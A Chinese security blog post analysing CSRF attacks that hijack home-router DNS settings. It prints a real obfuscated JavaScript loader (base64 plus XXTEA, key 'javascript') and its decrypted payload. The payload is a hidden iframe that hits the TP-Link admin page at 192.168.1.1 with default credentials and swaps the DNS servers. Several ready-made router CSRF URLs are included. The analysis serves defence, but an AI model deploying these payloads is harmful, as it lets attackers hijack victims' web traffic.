DNS劫持TP-link漏洞利用
路由器安全不仅仅是"病毒安全":因为它开放了Web端口,这意味着Web层面的问题同样会影响到它.这里介绍一种新型的攻击方式,在国内应用得并不多,但由于电信猫中存在超级用户,它可以造成很大的影响.
攻击流程:
1.你访问了一个被嵌入了攻击代码的网页(这很容易做到).
2.攻击者利用跨域表单提交的特性,使用默认密码或路由器内置的超级用户,就可以修改你路由器中的DNS服务器设置.
3.修改DNS服务器意味着什么?意味着攻击者可以像电信运营商一样给你乱插广告,劫持你访问的网页.....
没有开WIFI,没有开对外访问端口是不是就安全了?
答案是否定的,因为上面的攻击流程并没有涉及到wifi和外网.
根本原因:
路由器厂商的安全意识还没有进化到Web2.0时代!
------------------------------------------------------------------------
TP-link攻击演示:


POC:http://jsbin.com/usovoz


该攻击利用了CSRF技术,Bogdan Calin在电子邮件中插入特定的URL,指向路由器默认的IP地址(通常为192.168.1.1),URL中包含一些参数,如修改DNS服务器的配置,完整的地址看起来如下:
http://admin:password@192.168.1.1/start_apply.htm?dnsserver=66.66.66.66

研究人员在华硕RT-N16、RT-N56U、TP-LINK TL-WR841N、Arcor EasyBox A 600等路由器上成功实施了该攻击,根据卡巴斯基实验室统计,在巴西约有450万台路由器存在该问题。-----------------------------------------http://mp.weixin.qq.com/mp/appmsg/show?__biz=MjM5NTUzMzMwMQ==&appmsgid=10000068&itemidx=1#wechat_redirect%29
这里提到的样本:
cdn.baidu.com.baidutings.com/61/index.asp
内容:
<script src="http://s20.cnzz.com/stat.php?id=5229865&web_id=5229865" language="JavaScript"></script>
<script language =javascript>
/**
 * Decode a "binary string" (one UTF-8 byte per char code) into a JS string.
 * Handles 1-, 2- and 3-byte sequences only. Bytes whose high nibble is
 * 8..11 or 15 (stray continuation bytes, 4-byte lead bytes) and any code
 * unit above 0xFF are silently dropped, matching the original decoder.
 * Reading a continuation byte past the end of the input yields NaN, which
 * the masking turns into 0.
 * @param {string} str - UTF-8 bytes, one per character
 * @returns {string} the decoded (UTF-16) string
 */
function utf8to16(str) {
  var pieces = [];
  var total = str.length;
  var pos = 0;
  var b2;
  var b3;
  while (pos < total) {
    var lead = str.charCodeAt(pos++);
    var hiNibble = lead >> 4;
    if (hiNibble <= 7) {
      // 0xxxxxxx: plain ASCII, copy the character through.
      pieces.push(str.charAt(pos - 1));
    } else if (hiNibble === 12 || hiNibble === 13) {
      // 110xxxxx 10xxxxxx
      b2 = str.charCodeAt(pos++);
      pieces.push(String.fromCharCode(((lead & 0x1f) << 6) | (b2 & 0x3f)));
    } else if (hiNibble === 14) {
      // 1110xxxx 10xxxxxx 10xxxxxx
      b2 = str.charCodeAt(pos++);
      b3 = str.charCodeAt(pos++);
      pieces.push(
        String.fromCharCode(
          ((lead & 0x0f) << 12) | ((b2 & 0x3f) << 6) | (b3 & 0x3f)
        )
      );
    }
    // Anything else is dropped without advancing past its continuation bytes.
  }
  return pieces.join('');
}
// Reverse lookup table for the standard base64 alphabet: byte value (0..127)
// -> 6-bit value, or -1 for bytes that are not alphabet characters.
// '=' (0x3D) is deliberately -1, so the decoder treats it as padding only
// where it explicitly checks for it. Indices 128..255 are not present.
var base64DecodeChars = (function buildBase64Table() {
  var alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
  var table = [];
  for (var byteValue = 0; byteValue < 128; byteValue++) {
    // indexOf returns -1 for anything outside the alphabet.
    table.push(alphabet.indexOf(String.fromCharCode(byteValue)));
  }
  return table;
})();
/**
 * Decode base64 text into a "binary string" (one byte per char code).
 * Lenient, like the original: bytes outside the alphabet (whitespace,
 * punctuation, or anything >= 0x80) are skipped while looking for the next
 * sextet. A '=' in the 3rd or 4th position of a quartet ends decoding and
 * returns what has been produced so far; a '=' in the 1st or 2nd position is
 * simply skipped as a non-alphabet byte (the table maps it to -1).
 * Depends on the module-level base64DecodeChars table.
 * @param {string} str - base64 text
 * @returns {string} decoded bytes as a binary string
 */
function base64decode(str) {
  var PAD = -2; // sentinel: '=' seen where padding is legal
  var total = str.length;
  var pos = 0;
  var out = '';

  // Next sextet, skipping non-alphabet bytes; -1 if the input ran out on one.
  function readSextet() {
    var value;
    do {
      value = base64DecodeChars[str.charCodeAt(pos++) & 0xff];
    } while (pos < total && value == -1);
    return value;
  }

  // As readSextet, but reports a raw '=' byte as PAD before any table lookup.
  function readSextetOrPad() {
    var raw;
    var value;
    do {
      raw = str.charCodeAt(pos++) & 0xff;
      if (raw == 61) {
        return PAD;
      }
      value = base64DecodeChars[raw];
    } while (pos < total && value == -1);
    return value;
  }

  while (pos < total) {
    var c1 = readSextet();
    if (c1 == -1) {
      break;
    }
    var c2 = readSextet();
    if (c2 == -1) {
      break;
    }
    out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

    var c3 = readSextetOrPad();
    if (c3 === PAD) {
      return out;
    }
    if (c3 == -1) {
      break;
    }
    out += String.fromCharCode(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2));

    var c4 = readSextetOrPad();
    if (c4 === PAD) {
      return out;
    }
    if (c4 == -1) {
      break;
    }
    out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
  }
  return out;
}
/**
 * Turn an array of 32-bit words into a "binary string", 4 little-endian
 * bytes per word. Mutates `v` in place (each word is replaced by its 4-char
 * string), exactly as the original does.
 * @param {number[]} v - 32-bit words; when `w` is set, the last word holds
 *   the byte length the result is truncated to
 * @param {boolean} w - true to honour the trailing length word
 * @returns {string} the packed bytes
 */
function long2str(v, w) {
  var count = v.length;
  // Length word read before the loop overwrites it; undefined & mask -> 0.
  var declaredLen = v[count - 1] & 0xffffffff;
  for (var idx = 0; idx < count; idx++) {
    var word = v[idx];
    v[idx] = String.fromCharCode(
      word & 0xff,
      (word >>> 8) & 0xff,
      (word >>> 16) & 0xff,
      (word >>> 24) & 0xff
    );
  }
  var joined = v.join('');
  return w ? joined.substring(0, declaredLen) : joined;
}
/**
 * Pack a "binary string" into 32-bit words, 4 little-endian bytes per word.
 * charCodeAt past the end yields NaN, which the bitwise operators turn into
 * 0, so a trailing partial word is zero-padded.
 * @param {string} s - bytes, one per character
 * @param {boolean} w - true to append the byte length as an extra word
 * @returns {number[]} the packed words
 */
function str2long(s, w) {
  var words = [];
  var total = s.length;
  for (var off = 0; off < total; off += 4) {
    words.push(
      s.charCodeAt(off) |
        (s.charCodeAt(off + 1) << 8) |
        (s.charCodeAt(off + 2) << 16) |
        (s.charCodeAt(off + 3) << 24)
    );
  }
  if (w) {
    words.push(total);
  }
  return words;
}
/**
 * XXTEA (Corrected Block TEA) decryption over "binary strings".
 * @param {string} str - ciphertext, one byte per char code (here the output
 *   of base64decode); an empty string returns "" immediately
 * @param {string} key - key bytes; str2long packs them into 32-bit words and
 *   only k[0..3] are indexed ((p&3)^e), so a key shorter than 16 bytes leaves
 *   some k[] entries undefined and they participate as 0
 * @returns {string} plaintext as a binary string, trimmed to the length word
 *   stored in the final block (long2str with w=true)
 */
function xxtea_decrypt(str,key){if(str==""){return"";}
// Standard XXTEA schedule: q = floor(6 + 52/(n+1)) rounds, delta = 0x9E3779B9.
// `&0xffffffff` keeps intermediates within 32 bits (as signed JS ints); the
// inner for-loop unwinds the last->first word dependency one round at a time.
var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
// Word 0 wraps around to the last word (z=v[n]), then the round counter steps down.
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
// Encrypted second-stage payload. Analysis note: base64 text which the loader
// below decrypts with XXTEA under the hard-coded key 'javascript', UTF-8
// decodes, and writes straight into the document; the decrypted markup is
// reproduced further down in the post. `t` is an implicit global (no var).
// (The blob is one string literal in the sample; the page wraps it onto two
// lines, which is why it looks unterminated here.)
t="qa+JO3DSLWHP822m4ckX8f/gXA1eMoEi0mmyE+xiviaVb1A+i1oS1/77E73Bk1X06LEveQQxwqTfa/ZLA87S58TTbqsrKbvMv0rYdbM0pNAjUf+9erOyEA+bNqpusTX1wGWS3P3czE+k8eljPKaKUET0Ls9KEJZHKQ9mmYYZrvIC/lE7213ZknoTSJLuCg4DTPMrO1ajndG4lugm+JZHuhRdQrOxHWctDM2vOvqssKygAgIqkXeb2xgJg4bstObOVTovj3DR9yha5SgBf4kLwH2XsR0qnxKEiKoCYyThXdWJv0qLLKtJ1ZkopVvuY+s39tgvSCYfdaMA/Jc1wBKjfU7SgIG+Ou8q61i90twzAXtY92x59zPuWB8USiLJLOOJ2jgT6ZF6tuJ911p9PxpA9Ue5fjrPPnsJGxlGkQDh7L
bBY0uenZmtVsNxYZFpYVhjOO1dDR0WJujoBocadkOa/tBPI+uqw8KqaY0Ut4IcgDZDbuDTYgg5QmV1wGfCNas/TWMtnREs77WqzxpgTZ6qZNkM2kGJJVH2Y+KLfiMibjAFtn6ApagoPMgHTowVsJpvhwOgZ51QyRTpYABx2zBU+94TZxmE5Q2Xyk9Snj1m6H8z4hEloc/dUwi+z6HtkVD1yb7lYk0NnEQwo8wFQijPj1O5uP/yJ2mnKRPDHy+ofP3ev5WNDFjkliBwAzjgeivTaILIBAHJZj1tXQd0eHZZA2zq0Rmp6dN30emT84b6aExduJnQB4W6fDa6GcQi6dn7fHfmHOUL4WhlhVO1Tgj82K+NGxlOI6lMgFPQMQTHpxCXnGNUVwOBYC9r2Bfl3pdOMXDfc3nHxyoHFZfpX6TSSdSqFrHkC9G6UE04TVzYruURA6D6Keeet6sV1j9uTG6tvQd+0MmHjXngr1b3PX9YS+Gbe8nqB5Vr4ZiUTZ2RIegBW";
// Three-stage unpack: base64 -> XXTEA(key 'javascript') -> UTF-8.
t=utf8to16(xxtea_decrypt(base64decode(t), 'javascript'));
// The decoded markup is injected via document.write; for detection, this
// decode-then-document.write chain is the observable behaviour of the loader.
document.write (t);
</script>

解密后:
<div style='display:none'>
<script type="text/javascript">
/**
 * Decoded second-stage payload, reproduced as the post prints it. Analysis
 * notes: the statement separators between the several statements on each
 * line appear to have been lost in rendering, so the text as shown is not
 * directly runnable. What the code does: it uses a cookie ("Cookier1") as a
 * 4-minute throttle, and when the cookie is absent it writes a hidden iframe
 * whose src is a LAN router admin URL (192.168.1.1) carrying embedded default
 * credentials and DHCP/DNS form parameters, i.e. a CSRF request against the
 * router's management interface that swaps the DNS servers handed out by DHCP.
 */
function goad() {
// Expiry 4 minutes ahead; the cookie marks that the request was already sent.
var Then = new Date() Then.setTime(Then.getTime() + 4 * 60 * 1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookier1="
// Only fire when the marker cookie is absent (the true branch is intentionally empty).
var beginPosition = cookieString.indexOf(cookieHeader) if (beginPosition != -1) {} else {
// Set the marker, then inject the iframe. Detection hint: third-party pages
// embedding private-range admin URLs with userinfo (user:pass@host) are a
// strong indicator of router CSRF; the fix on the router side is CSRF tokens,
// no default credentials, and no basic-auth-in-URL acceptance.
document.cookie = "Cookier1=Filter;expires=" + Then.toGMTString() document.write('<iframe src="http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=30&gateway=0.0.0.0&domain=&dnsserver=207.254.182.61&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6" width="100" height="200"></iframe>');
}
}
// Runs immediately on page load inside a display:none container (see the
// surrounding div), so the victim sees nothing.
goad();
</script>
</div>
乌云:
http://paper.wooyun.org/bugs/wooyun-2010-037425
http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=121.157.39.111&dnsserver2=114.114.114.114&Save=%B1%A3+%B4%E6多次访问发现admin:admin,会变化,例如admin:123456,也就是利用路由器默认密码不断尝试修改路由器dns为121.157.39.111、114.114.114.114。